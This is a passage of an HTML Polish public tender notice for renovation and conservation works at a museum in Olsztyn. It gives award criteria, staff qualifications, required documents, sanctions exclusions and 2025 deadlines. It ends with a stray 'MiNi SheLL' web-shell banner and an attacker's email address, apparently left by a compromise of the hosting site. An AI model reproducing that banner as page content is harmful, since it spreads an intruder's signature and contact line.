zamknięć np. w postaci kłódek (gdy brak jest innych zamykanych przegród na wejściu do części nieremontowanej, a wymagają tego względy bezpieczeństwa),<br/>9)	szczegółowy opis przedmiotu zamówienia w niniejszym postępowaniu zawarty <br/>w dokumentacjach projektowych, Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych (dalej STWiORB), przedmiarach robót, SWZ, wzorze umowy wraz z załącznikami;<br/>10)	Wykonawca wykona przedmiot zamówienia na podstawie dokumentacji projektowych, STWiORB, SWZ wraz z załącznikami, pytaniami i odpowiedziami udzielonymi w trakcie procedury o udzielenie zamówienia publicznego oraz przedmiarami robót, a także obowiązującymi przepisami szczegółowymi i sztuką budowlaną zapewni pełną obsługę geodezyjną wraz z okresem gwarancji i rękojmi. Podstawą sporządzenia oferty jest dokumentacja projektowa, STWiORB, SWZ oraz udzielone odpowiedzi na zapytania w trakcie procedury o udzielenie zamówienia publicznego. Przedmiary stanowią tylko materiał pomocniczy,<br/><br/><br/>Z uwagi na ograniczoną liczbę znaków tej sekcji ogłoszenia szczegółowy opis przedmiotu zamówienia i wymagania dotyczące przedmiotu zamówienia określone są w SWZ wraz z załącznikami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45454000-4 - Roboty restrukturyzacyjne</p> <p class="mb-0">45453100-8 - Roboty renowacyjne</p> <p class="mb-0">45454100-5 - Odnawianie</p> <p class="mb-0">45324000-4 - Roboty w zakresie okładziny tynkowej</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45223210-1 - Roboty konstrukcyjne z wykorzystaniem stali</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający jako najkorzystniejszą, wybierze ofertę, która uzyska największą łączną punktację w kryteriach oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w § VIII SWZ, oraz spełniają określone przez Zamawiającego warunki udziału <br/>w postępowaniu. <br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia warunku <br/>w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie stawia warunku w powyższym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej: Zamawiający nie stawia warunku w powyższym zakresie.<br/>4)	zdolności technicznej lub zawodowej. Wykonawca spełni warunek, jeżeli wykaże, że:<br/>4.1)	doświadczenie zawodowe: Zamawiający nie stawia warunku w powyższym zakresie<br/>4.2)	kadra techniczna: Zamawiający uzna warunek za spełniony, jeżeli Wykonawca na czas realizacji zamówienia będzie dysponował osobami o odpowiednich kwalifikacjach zawodowych niezbędnych do wykonania zamówienia, tj.: <br/>a)	co najmniej jedną osobą, która będzie pełnić funkcję kierownika robót posiadającą: <br/>-	uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń <br/>w specjalności konstrukcyjno-budowlanej lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania, których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w/w specjalności umożliwiające zrealizowanie przedmiotowego zamówienia, <br/>-	doświadczenie zawodowe określone w art. 37c ustawy z dnia 23 lipca 2003r. o ochronie zabytków i opiece nad zabytkami;<br/>b)	co najmniej jedną osobą, która będzie pełnić funkcję kierownika robót posiadającą: <br/>-	uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń <br/>w specjalności w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania, których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w/w specjalności umożliwiające zrealizowanie przedmiotowego zamówienia,<br/>-	doświadczenie zawodowe określone w art. 37c ustawy z dnia 23 lipca 2003r. o ochronie zabytków i opiece nad zabytkami;<br/>c)	co najmniej jedną osobą, która będzie pełnić funkcję kierownika prac konserwatorskich i restauratorskich specjalność konserwacja cegły i detalu architektonicznego posiadającą:<br/>-	wykształcenie i zawodowe doświadczenie, określone w art. 37a ustawy z dnia 23 lipca 2003r. o ochronie zabytków i opiece nad zabytkami; <br/>-	przez funkcję kierownika prac zamawiających rozumie osobę prowadzącą prace konserwatorskie na podstawie pozwolenia WKZ,<br/>d)	co najmniej jedną osobą, która będzie pełnić funkcję archeologa - prowadzącym nadzór archeologiczny nad wszelkimi pracami ziemnymi - posiadającą : <br/>-	wykształcenie i doświadczenie zawodowe określone w art. 37e ustawy z dnia 23 lipca 2003r. o ochronie zabytków i opiece nad zabytkami.<br/>e)	Zamawiający dopuszcza pełnienie funkcji poszczególnych kierowników robót/prac/badań ww. specjalnościach przez jedną osobę pod warunkiem posiadania wymaganych uprawnień dla poszczególnych branż, <br/>f)	ocena spełniania warunku nastąpi na podstawie wstępnego oświadczenia zgodnie <br/>z Załącznikiem nr 2A do SWZ, o którym mowa w §IX ust. 1 SWZ, które stanowi wstępne potwierdzenie, że wykonawca spełnia warunki udziału w postępowaniu. Następnie na podstawie dokumentu, o którym mowa w §IX ust. 4 pkt 2 lit. b SWZ, złożonego na wezwanie Zamawiającego przez wykonawcę, którego oferta została najwyżej oceniona (zgodnie z załącznikiem nr 3 do SWZ). Zamawiający określając wymogi dla osób <br/>w zakresie posiadanych uprawnień dopuszcza odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia nabyte w innych niż Rzeczpospolita Polska państwach członkowskich Unii Europejskiej, państwach członkowskich Europejskiego porozumienia o wolnym Handlu (EFTA) - stronach umowy o Europejskim Obszarze Gospodarczym, Konfederacji Szwajcarskiej, zgodnie z art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane oraz oaz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej, wówczas wykonawca na własny koszt zapewni tłumacza języka polskiego, który zapewni stałe i biegłe tłumaczenie <br/>w kontaktach pomiędzy Zamawiającym a Wykonawcą, a także zapewni tłumaczenie na bieżąco wszystkich dokumentów związanych z realizacją przedmiotowego zamówienia stworzonych zarówno przez Wykonawcę, jak i dostarczonych przez Zamawiającego, <br/>g)	Zamawiający informuje, że wymaga, aby osoby wskazane w załączniku nr 3 do SWZ brały bezpośredni udział w wykonywaniu zamówienia,<br/>h)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają w/w warunki określone w ppkt 4.2.<br/>4.3)	potencjał techniczny: Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/><br/>Z uwagi na ograniczoną liczbę znaków zapisy dotyczące oceny spełnia warunków udziału w postępowaniu oraz polegania na zasobach podmiotu trzeciego są określone w §VII ust.1-5 SWZ <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Wykaz podmiotowych środków dowodowych, składanych przez wykonawcę w postępowaniu na wezwanie Zamawiającego w celu potwierdzenia okoliczności, o których mowa w art. 125 ust. 1 ustawy Pzp :<br/>1)	potwierdzające brak podstaw do wykluczenia: <br/>a)	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/><br/><br/>2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 1 ppkt 1 lit a niniejszej sekcji ogłoszenia (ust. 4 pkt 1 lit. a SWZ ) , składa dokument lub dokumenty wystawione w kraju, w którym wykonawcy ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd,<br/>nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące ich złożeniem.<br/><br/>3. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument miał dotyczyć, nie wydaje się dokumentów, o których mowa w pkt 1 ppkt 1 lit a niniejszej sekcji ogłoszenia (ust. 4 pkt 1 lit. a SWZ ), zastępuje się je w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument miał dotyczyć, nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania<br/>wykonawcy lub miejsce zamieszkania osoby, której dokument miał dotyczyć . Termin, o którym mowa w pkt 2 niniejszej sekcji ogłoszenia (ust. 5 SWZ) stosuje się odpowiednio.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Wykaz podmiotowych środków dowodowych, składanych przez wykonawcę w postępowaniu na wezwanie Zamawiającego w celu potwierdzenia okoliczności, o których mowa w art. 125 ust. 1 ustawy Pzp :<br/>1)	potwierdzające spełnianie warunków udziału w postępowaniu:<br/>a)	wykaz osób, odpowiadający warunkowi określonemu w §VII ust.2 pkt 4 ppkt 4.2 SWZ, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - załącznik nr 3 do SWZ;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Ofertę składa się na formularzu ofertowym - zgodnie z załącznikiem nr 1 do SWZ. Wraz z ofertą wykonawca zobowiązany jest złożyć: <br/>1)	oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez zamawiającego zgodnie z wzorem stanowiącym załącznik nr 2A do SWZ oraz niepodleganiu wykluczeniu zgodnie z wzorem stanowiącym załącznik nr 2B do SWZ,<br/>2)	pełnomocnictwo: <br/>a)	jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika <br/>z dokumentów, o których mowa w pkt 6, wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie w szczególności do złożenia oferty lub do złożenia oferty i podpisania umowy,<br/>b)	zapis lit. a stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp, <br/>c)	W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców należy załączyć do oferty. Pełnomocnictwo powinno być załączone do oferty i powinno zawierać w szczególności wskazanie: <br/>-	postępowania o zamówienie publiczne, którego dotyczy, <br/>-	wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych <br/>z nazwy z określeniem adresu siedziby,<br/>-	ustanowionego pełnomocnika oraz zakresu jego umocowania<br/>3)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych <br/>z wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy - wzór załącznik nr 2D do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym .<br/>4)	jeżeli wykonawca, polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby - zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia (załącznik nr 5 do SWZ) lub inny podmiotowy środek dowodowy potwierdzający, że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określający <br/>w szczególności :<br/>a)	zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b)	sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>c)	czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega <br/>w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/>5)	oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu przez podmiot udostępniający zasoby, jeżeli Wykonawca polega na zasobach podmiotu trzeciego w celu wykazania spełniania warunków udziału w postępowaniu - załącznik nr 2C do SWZ,<br/>6)	odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji <br/>o Działalności Gospodarczej lub innego właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania : <br/>a)	wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w pkt 6, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów, <br/>7)	przedmiotowe środki dowodowe:<br/>a)	nie dotyczy;<br/>8)	inne oświadczenia składane wraz z ofertą:<br/>a)	nie dotyczy; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z art. 58 ust. 5 uPzp przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających o udzielenie zamówienia. Pozostałe wymagania dotyczące wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia określono w SWZ oraz w ogłoszeniu w sekcji dot. warunków udziału w postępowaniu i sekcji IX ogłoszenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia określono we wzorze umowy(załącznik nr 4 do SWZ) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-18 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca może złożyć ofertę wyłącznie za pośrednictwem Platformy pod adresem: https://muzeum-olsztyn.logintrade.net/zapytania_email,206018,0cbb167d60948b5c5000f6006144475b.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-18 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-09-16</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> I. Dodatkowe przesłanki wykluczenia:<br/>6.	Z postępowania o udzielenie zamówienia publicznego wyklucza się:<br/>1)	wymienionego w wykazach określonych w rozporządzeniu Rady (WE) nr 765/2006 z dnia 18 maja 2006 r. dotyczącego środków ograniczających w związku z sytuacją na Białorusi i udziałem Białorusi w agresji Rosji wobec Ukrainy (Dz.Urz.UE L 134 z 20.05.2006, str. 1, ze zm.; dalej: rozporządzenie 765) i rozporządzeniu Rady (UE) nr 269/2014 z dnia 17 marca 2014 r. w sprawie środków ograniczających w odniesieniu do działań podważających integralność terytorialną, suwerenność i niezależność Ukrainy lub im zagrażających (Dz.Urz.UE L 78 z 17.03.2014, str. 6, ze zm.; dalej: rozporządzenie 269) albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego ( ustawa sankcyjna); <br/>2)	którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. <br/>o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu jest osoba wymieniona w wykazach określonych w rozporządzeniu 765 i rozporządzeniu 269 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy sankcyjnej; <br/>3)	którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy o rachunkowości jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765 i rozporządzeniu 269 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy sankcyjnej,<br/>7.	Wykluczenie następuje na okres trwania okoliczności, o których mowa w ust. 6.<br/>8.	W przypadku wykonawcy wykluczonego na podstawie ust. 6, zamawiający odrzuca ofertę takiego Wykonawcy.<br/>II. Dotyczy sekcji IV pkt 4.2.10.) Ogłoszenia - Okres realizacji zamówienia albo umowy ramowej:<br/>1.	Przedmiot zamówienia zostanie zrealizowany w terminie 50 dni od dnia zawarcia umowy, nie później niż do 15.10.2025 r. z uwagi na konieczność wydatkowania i rozliczenia dotacji celowej otrzymanej na realizację przedmiotu zamówienia. <br/>2.	W przypadku, gdy zawarcie umowy nastąpi w terminie przy którym liczba 50 dni będzie wybiegać poza datę 15.10.2025 r., to obowiązującym ostatecznym terminem wykonania przedmiotu zamówienia jest dzień 15.10.2025 r. W przypadku, gdy zawarcie umowy nastąpi w terminie przy którym liczba 50 dni będzie upływała przed datą 15.10.2025 r., to obowiązującym ostatecznym terminem wykonania przedmiotu zamówienia jest 50 dzień liczony od dnia podpisania umowy. <br/>3.	Szczegółowe zagadnienia dotyczące terminu realizacji umowy uregulowane są we wzorze umowy stanowiącej załącznik nr 4 do SWZ

Creat By MiNi SheLL
Email: jattceo@gmail.com